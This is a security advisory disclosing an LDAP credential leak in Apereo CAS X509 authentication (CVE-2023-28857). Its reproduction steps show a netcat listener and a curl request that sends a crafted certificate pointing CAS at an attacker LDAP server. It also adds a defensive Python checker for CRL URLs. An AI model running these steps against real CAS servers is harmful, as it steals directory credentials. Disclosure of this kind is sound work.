Coordinated Disclosure Timeline
- 2023-02-20: Report sent to cas-appsec-private@apereo.org
- 2023-02-20: Acknowledged and fixed, version 6.6.6 is available to download via cas-overlay
- 2023-02-20: Maintainer issues a public post describing the problem
Summary
When CAS is configured to use X509 certificate authentication with LDAP directory, an unauthenticated user can leak the credentials for LDAP authentication. This is possible by sending a specially crafted X509 client certificate that contains a “CRL Distribution Points” extension with URLs pointing to a malicious resource.
Product
Apereo CAS
Tested Version
Details
LDAP password leak in X509CredentialsAuthenticationHandler.java (GHSL-2023-009, CVE-2023-28857)
Apereo CAS can be configured to use authentication based on client X509 certificates. These certificates can be provided via the TLS handshake or via a special HTTP header, such as “ssl_client_cert”. When checking the validity of the provided client certificate, X509CredentialsAuthenticationHandler verifies that the certificate has not been revoked. To do so, it fetches the URLs listed in the certificate's “CRL Distribution Points” extension; because these URLs are taken from the certificate itself, they can be controlled by a malicious user.
If the CAS server is configured to use an LDAP server for X509 authentication with a password, for example by setting the “cas.authn.x509.ldap.ldap-url” and “cas.authn.x509.ldap.bind-credential” properties, X509CredentialsAuthenticationHandler fetches the revocation URLs from the certificate, and those URLs can be LDAP URLs. When making requests to these LDAP URLs, Apereo CAS uses the same password as for the initially configured LDAP server, which can lead to a password leak.
Note: X509CredentialsAuthenticationHandler only checks date validity and revocation status, not the validity of the provided certificate's signature, so even an untrusted self-signed certificate can be used to exploit the issue. If Apereo CAS is placed behind a reverse proxy that checks the validity of the TLS certificate, this vulnerability can still be exploited, but an attacker needs to somehow craft a signed certificate with a CRLDP extension.
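As an added defensive check (not code from the advisory or from the CAS project), the following Python extracts the URIs from a certificate's “CRL Distribution Points” extension value and flags any that is not an HTTP(S) URL to an allowlisted host, the gate a revocation checker can apply before fetching anything; the DER sample, the host names and the allowlist are constructed for illustration.

```python
from urllib.parse import urlsplit

URI_TAG = 0x86  # GeneralName uniformResourceIdentifier [6] (RFC 5280, 4.2.1.13)

def _read_tlv(buf, pos):
    """Parse one DER tag-length-value at pos; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long form: low bits give the number of length octets
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def extract_crldp_uris(der):
    """Collect every URI GeneralName found inside a DER CRLDistributionPoints value."""
    uris, pos = [], 0
    while pos < len(der):
        tag, value, pos = _read_tlv(der, pos)
        if tag == URI_TAG:
            uris.append(value.decode("ascii"))
        elif tag & 0x20:  # constructed: descend into SEQUENCE, [0], [1] ...
            uris.extend(extract_crldp_uris(value))
    return uris

def check_crldp_policy(uris, allowed_hosts):
    """Map each URI to True only if it is HTTP(S) to an allowlisted host."""
    verdicts = {}
    for uri in uris:
        parts = urlsplit(uri)
        verdicts[uri] = parts.scheme in ("http", "https") and parts.hostname in allowed_hosts
    return verdicts

def _der(tag, content):
    """Encode one DER TLV (short or long length form); used to build sample data."""
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    length_bytes = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length_bytes)]) + length_bytes + content

def _distribution_point(uri):
    # DistributionPoint { distributionPoint [0] { fullName [0] { uri [6] } } }
    return _der(0x30, _der(0xA0, _der(0xA0, _der(URI_TAG, uri.encode("ascii")))))

# Constructed sample: one legitimate HTTP CRL URL plus an LDAP URL of the shape
# the advisory describes (host names are placeholders, not real systems).
SAMPLE_CRLDP = _der(0x30, _distribution_point("http://crl.example.org/ca.crl")
                    + _distribution_point("ldap://attacker.example:1389/"))

# Verdicts for the sample; a revocation checker should refuse to fetch the LDAP one.
SAMPLE_VERDICTS = check_crldp_policy(extract_crldp_uris(SAMPLE_CRLDP), {"crl.example.org"})
```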
Steps to reproduce
- Download CAS Overlay v6.6.4 from cas-initializer (https://casinit.herokuapp.com/ui), including the cas-server-support-x509 and cas-server-support-rest-x509 dependencies. Unzip it to a local folder.
- Build it using the following commands, for example: ./gradlew clean build, mkdir /etc/cas, ./gradlew createKeystore and ./gradlew copyCasConfiguration
- Start Apereo CAS with the following parameters*:
cas.authn.x509.crl-fetcher=ldap \
cas.authn.x509.extract-cert=true \
cas.authn.x509.ldap.base-dn=o\=tomcat \
cas.authn.x509.ldap.bind-credential=s3cr3taaaaa \
cas.authn.x509.ldap.bind-dn=admin \
cas.authn.x509.ldap.ldap-url=ldap://example.com:1389/ \
cas.authn.x509.ldap.search-filter=cn\={user} \
cas.authn.x509.revocation-checker=crl \
cas.rest.x509.header-auth=true \
java -jar ./build/libs/cas.war
It will start a CAS instance that uses the LDAP server located at ldap://example.com:1389/ with the credentials admin and s3cr3taaaaa. It will also enable revocation checking using LDAP.
- Open a netcat listener on the localhost or any accessible network device:
nc -lv 1389
- Next, send a request with a malicious certificate that contains a URL for the attacker-controlled LDAP server ldap://localhost:1389/ in the CRLDP extension:
curl -i -s -k -X POST https://localhost:8443/cas/v1/tickets/ \
-H $'ssl_client_cert: -----BEGIN CERTIFICATE----- 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-----END CERTIFICATE-----'
- When processing this request, the vulnerable CAS server initiates a connection to the user-provided URL https://localhost:1389/ with the username and password initially configured for ldap://example.com:1389/.
* This is just an example configuration for easy testing; in real production systems it might be different but still vulnerable.
Impact
An unauthenticated user can leak the password used for the LDAP connection configured on the server.
CVE
- CVE-2023-28857
Credit
This issue was discovered and reported by GHSL team member @artsploit (Michael Stepankin).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-009 in any communication regarding this issue.